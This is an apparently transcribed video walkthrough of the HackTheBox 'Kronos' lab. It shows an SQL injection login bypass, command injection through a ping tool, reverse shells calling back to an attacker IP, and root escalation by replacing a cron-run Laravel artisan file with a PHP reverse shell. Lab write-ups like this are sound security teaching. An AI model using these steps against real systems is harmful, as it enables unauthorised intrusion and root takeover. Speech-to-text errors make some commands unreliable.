What's going on, and welcome back. In today's video we are going to see the box here named Kronos. The Kronos is a Linux box from HackTheBox. In this box we will gonna exploit multiple vulnerabilities. Among these vulnerabilities is SQL injection, and of course we're gonna do the privilege escalation by exploiting the Laravel task scheduler. So we start by doing nmap scan, and nmap scan reveals three open ports. We have 22 SSH, we have 53 for DNS, and we have 80 for HTTP. So when we see a DNS server running, it means that there are DNS records that need to be examined. So before doing anything, we need to enumerate the DNS records, right? Okay. So we will leave the nmap here and we'll create a new tab to perform our operation. So here, sudo ns lookup. So let's type 10, 10, 10, 13, the IP address of the machine. Can't find, sorry, can't find, let me check. Type server 10, 10, 10, 13. Default server 10, 10, 13, and it is running on port 53. Type the IP now. So see we have one name server, ns1 kronos.htp. So the first thing we need to do, guys, is to add this to the host file. So we go back and we type sudo nano right 10, 10, 10, 13 s1 dot Kronos HTTP. Let's see what else we have. So basically that's the first thing we do. Now we will use a tool to enumerate DNS further. So we can use many tools in Linux, Kali Linux here. Click on applications, and we have a full set of information gathering tools that are tied to DNS. DNS enum, DNS map, DNS recon, tracer, walk, fierce, URL crazy. So I'm gonna use fierce now for this tutorial. Sudo fierce, but I need to remind myself of the commands actually. Sudo can't write. Okay, sudo fierce let's see the options we have. No? -l. Right, so here we have DNS domain, domain name to test, connect wide. Okay, let's supply the domain --domain and put the name server. The name server is ns1.kronos.htp. Oh, remove the help. Failed to look up NSSOA domain, doesn't exist. Right, so let me do that. Again, add ten, 10, 10, 13. Okay, let's check DNS servers. DNS servers and type here NS1 and no results. Connect. Okay. All right. Let's use another tool to enumerate the DNS records. So I'm going to use DNS recon sudo DNS recon -t Kronos.http, and we specify the name servers ns1.kronos.http. Could resolve Kronos.http. Let's check that in the browser. So it is working. Why it is not recognizing the domain? Okay, in this case, I'm gonna use also another tool. Sudo, we can also use dig axfr at 10, 10, 10, 13, Kronos. Right, so here we have proper results. So basically we have Kronos HTTP admin Kronos ns1 Kronos. So we will have to add admin Kronos to the host file as well. So you go back and here we type 10, 10, 10, 13 admin HTTP and check. Okay, so let's explore the results further. So we have also www as well. I haven't paid attention to that. Admin Kronos, all of these have been added except this. Let's add this as well. Ten, 10, 10, 13, dub, dub, dub. Okay, I think we are done with the DNS. So you can use many tools, but sometimes not all of them work. For me, this one only works in the current scenario. Okay, so let's see here. Kronos, we get this. What about if we take that and we put dub, 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 the same, right? What about admin Kronos HTTP? So we get a login page. Now, for this scenario, we will have to bypass this login screen. Now we can do that multiple ways. We have the brute force, we have SQL injection, and of course, we can try to form a word list, of course, from the Kronos website using SQL to take a word list out of this page, use the word list with Hydra to crack the admin panel. Now you have also many options. So for this scenario, we're going to use the SQL injection option. Now, basically, SQL injection, we still first rely on pre-compiled payloads to try. Basically, these payloads, you can find them in Kali, actually. So basically, in word list, if I go to cd user share word list, and here if I select sect lists, fuzzing, let's see if there is something for SQL injection. Okay. Yeah, so you have this one, this is SQLi. Payloads. File names, zip bombs, zip traversal, antivirus, flash. Nope, not this one. Let's see, miscellaneous. Let me go back. There was some word list about SQL. Let me try to find this. wfuzz, injections. So you have one here, file that contains some payloads. Let's view the file. So these payloads can be tried against the login panel. So if I try this, and we go back to the page, paste, and enter. So this one didn't work. Let's see this one. So technically, you would go ahead and let Perp Suite try these payloads for you, or wfuzz. This one also didn't work. Let's go back. I remember one of these worked for me. Let me try this. What about admin? Or so this one worked. Oh, what happened? So the first payload, this one. We can also try more. For example, I have this one. We can also try the same. We can put or 1 equal 1. Let me try this one. No, take this only. This one also worked. What about we try something like or 1 equal 1, the classic one. This one also worked. Actually, these are here, but I can't remember which line I found them. So basically, if you want to automate this, let me exit the file first. Okay. If in some way you can't form these kind of payloads and you have to try all of these, all you have to do is to use Perp Suite here. We click on Perp Suite, configure the browser, the interceptor, and let me show you how. It's better to show that visually. So basically, we click on Vulnerability Application Analysis, Perp Suite. I'm not going to show that in action. I'm just going to show the way to do that automatically. But in a realistic scenario, I wouldn't go ahead and bombard the target server with SQL payloads in such a way that we use Perp Suite. We don't want this. Try with manual payloads. If they don't work, I would leave this kind of brute forcing, whether it was password brute force, SQL injection brute force, to the last. If it was inevitably if it was like need to be done in an automatic way. Of course, this is wasting our time because some people don't know how to use the automation with Perp Suite, so I'm going to need to show you how. So basically here, let's go ahead till Perp Suite opens. Let me select this one. And if we log in, we can see here we have traceroute tool, right? And we have also ping tool. So this reminds me of command injection. We have box that performs a command, right? So if we can trick this box to perform a command of our choice, after successfully performing the intended command, we can trick the system to do command injection or reversal. So let's say, for example, execute, no results, ping. Okay, so here purpose switch we have. So you would go to intruder, okay? After you intercept the request, send the request to intruder. Go to payloads, as you can see, and select the position of the payloads to be the username. Then go to payloads, load the word list here, go to the path of the SQL text here, okay, and select it from this box, click OK, open, and then start attack. It would find the correct payload that lets you log in. So I'm going to close purpose switch for now, click on yes, minimize. So we have here the ping. So what we can do here, we can try something like semicolon. It means that perform the former command and also the command that comes after the semicolon. ls, I have listed the current files in the current working directory. So here, all we have to do is to grab reversal, maybe one-liner bash, and connect to our machine back. So here, go back, and clear, go back, okay, so here we say nc-lbp 4545. Right. And here we grab some reversal, one-liner reversal, one-liner bash reversal. By the way, you can try Python, you can try Perl, you can try PHP, whatever you like. It is a command that will be performed by the server. So see, we can use Python, Perl, and this one. Let me try this one. Modify on it. So we put our IP, which I don't know. Okay, config 10.14.6. 14.6. The port is 4545. And finally, we receive a reversal. So the command injection worked successfully, and now we have a reversal. Right, so what I'm gonna do now, I'm gonna minimize this and work on our reversal. So first thing we do, guys, is we do Python, have a full qualified shell, Python-c import pty spawn. Okay, so we are data. Now the next thing is to conduct a privilege escalation. Okay, so basically here we are running a Laravel, the Laravel framework. How I do that? How do I know that? So I have a Laravel. If we cd to Laravel, we see we have the configuration files of the framework. So basically, for this scenario, guys, there are many ways to escalate your privileges. So basically, if you don't want what is Laravel, Laravel is a framework. Let me show you Laravel where you can find the documentation as it's going to be needed in this scenario. So it's PHP framework, and here we can see we can go to documentations, and we can see everything we need to find in order to work with this framework if we are not familiar with this framework. Okay, so for this challenge, let's go back. If we cat the cron, one of the things to check for privilege escalation is to check the cron tab. Cat etc cron tab. As you can see down here, we can see that there is a task scheduled as root run by root, and as you can see, it is in the Laravel. And according to the documentation of Laravel, if we go back here and type Laravel schedule scheduler, so here is everything you need to know about Laravel task scheduler. Now, how are we going to abuse this? As you can see, in Laravel, you can schedule commands and execute them on the system. So as you can see, you can execute shell commands. Schedule, exec, and you put the commands. So what we need to do here, let's go back. We have a task scheduled by Laravel, run by Laravel here, artisan, and run by root, right? So our purpose here, or objective, is to modify on the task, right, to run a reverse shell or run an executable or a binary or a tool, name it however you like, of our own. So we will create this binary and let Laravel run it, right? So it's going to return a reverse shell as a root. Why? Because the task is scheduled and run by root. And according to the documentation, you will see that the file responsible for scheduling tasks is the kernel.php. So if you go back and type here kernel, as you can see here, it is in app console kernel.php. So let's go back and inspect it. ls cd app cd console. So there is the kernel PHP file. In order to escalate our privileges, we will need to modify on it. In order to modify on this file, we will need to inspect the permissions. ls-la. As you can see, the fatal mistake here is data can read and write on this file, which means that we as a data can modify on this file. And if we can modify on this file, we can run whatever we like. For example, let's inspect or let's modify on it. So I don't know if there is nano here, nano kernel. Permission denied, we can't run nano. Okay, so what we're gonna do here, we're gonna cp kernel PHP and modify it or move it to var . Oops, I forgot to name actually. cp kernel.php var kernel PHP. No such file or directory. It is the capital B. Okay, cd c kernel. And also permission denied there. ls-la var. So we can move this here. cp kernel. That's excellent. Now we can download it. So basically we go back and we type, or here, kernel not found. Let me move this to admin and try to access it from there. Oh, we can't use that since we have the reversal here. So why I can't access this from here? Okay, no need for that. Let's cat kernel and take the content manually. I wanted to download that to my machine, but I couldn't. Let's take that content, copy that, and we go back to, let's create a new window, sudo nano kernel, right. So here let's inspect the application or the file. Right, so here we have the PHP file, the scheduler. As we go down, we can see that there is no command being executed. So what we can do here, we can add something to be executed, right? Let's see what we can do. So here, as you can see, the schedule command inspire. So we can modify this to perform our own command. So let me leave this as is, and nope, go down a bit. Okay. So here, according to the documentation, we can take the command from there. Let's see how we can schedule for something to run our own command. I'm interested in searching indefinitely. Let me sec. Okay. So take this. Let's copy that and paste. So here we modify on this. So our arena is to modify in this place. So here we type or we define whatever we would like to run. We can define a C file that invokes a bash reversal. We can define a PHP reversal. So what I'm going to do here, I'm going to opt for this option. So I'm gonna cancel this and type here php -f temp shell or Laravel shell.php. That's it. And here, instead of daily, I'm gonna type run this every minute. Why? Because we want to receive the shell as soon as possible. So here we type every minute. Okay. So we put this, and that's it. So what is Laravel shell? Laravel shell is a reverse shell. We download this from Pentest Monkey. See the reverse shells, cheat sheets. Somewhere here. Let's go back. So copy that. And we go back. So here we split the view again. Sudo nano Laravel shell. Paste and modify on this. So what we need to modify here, the IP and the port. So the IP will be our IP 10.10.14.6 4546, and that's it. And yes, okay, sudo python 3-n http server. All right, so now we will download kernel. Where is kernel? We will download the reverse shell and the kernel. The first thing we do, we go back here. We are in HTML. Let's go back. Let's go to Laravel, cd app, cd console, and we will replace this file with our own, this one. So wget uh, 10.10.14.6. Okay, let's compare. We have one here. Sudo mv kernel to kernel. Oh, I can't sudo, right? I forgot this. I put it on my own machine. Okay. Yep, understood. Understood. So this is our file. Let's inspect that it has been replaced successfully. And yes, okay. Now the next thing, we go to temp directory and download the reverse shell. Laravel PHP shell. All right. Now the last step is we launch a listener here beside this one, since we like to align listeners with each other. So nc-lvp 4546. Let's see if we receive anything now. Now what's going to happen, the kernel or the task scheduler will run the kernel.php, the kernel file, which will run this reverse shell, which in turn connects back to us. Now the other way around, if you don't want to use PHP here, you can create a C file. So for example, you can create sudo nano root shell int main void set UID. We put this 0 since the UID of root is 0, and set GID as well 0. And we set the system to execute. What does it execute? Bin bash. You can create this file. Now, the next thing is we compile it. Compile this -o root shell.c root no root. So we have root shell here. Now, in turn, you're going to modify on this sudo nano kernel. And here, instead of executing a PHP file, we will execute the root shell. But how? It's going to be like that. So instead of that, we will say, for example, change the ownership to root. Why? Because we want to return a root from reverse shell. Reverse shell from root. And here we type the name of the file, root shell. And the last thing, we need to give it permissions to run, since this is a executable file. Let's say 755 temp root shell. And you save. And after that, we download this, right? And we download this as well to the temp file. So let's see if we receive anything. So I can see here I waited for more than 1 minute and the root shell permissions have not changed. So I guess the task isn't being run. So we're going to take a look again at the cron tab and try other way. Cat etc cron tab. Okay, but let's try this. So Laravel, we have artisan file here, file artisan. So it is a PHP file. So what if we, the PHP script we have, let's say cp Laravel or temp Laravel, Laravel what? Let's go up, Laravel shell, and copy it to var Laravel. So we have our own reverse shell here. So what we're going to do, we're going to replace the name. We're going to replace this or this with this one. mv Laravel shell artisan. And yes, indeed, we received the reverse shell right immediately. So here ID, and you are the root user. So basically the exploit here, or the method worked with Laravel by manipulating the artisan file. But I tried with the kernel, didn't work. Anyway, in real case scenario, or realistically, both methods work. The kernel method and the artisan method. It's not an artisan, it's not by itself called artisan, by the way, but here the file scheduled to be run is artisan, and when defined on it, it actually run. But basically, the original file that is responsible for scheduling tasks and executing commands is the kernel PHP file, this one. Well, I know you saw it. So basically, both methods work, but in our scenario, the artisan methods worked. So try it on your own, see what method worked for you. Thank you so much, and see you in the next video.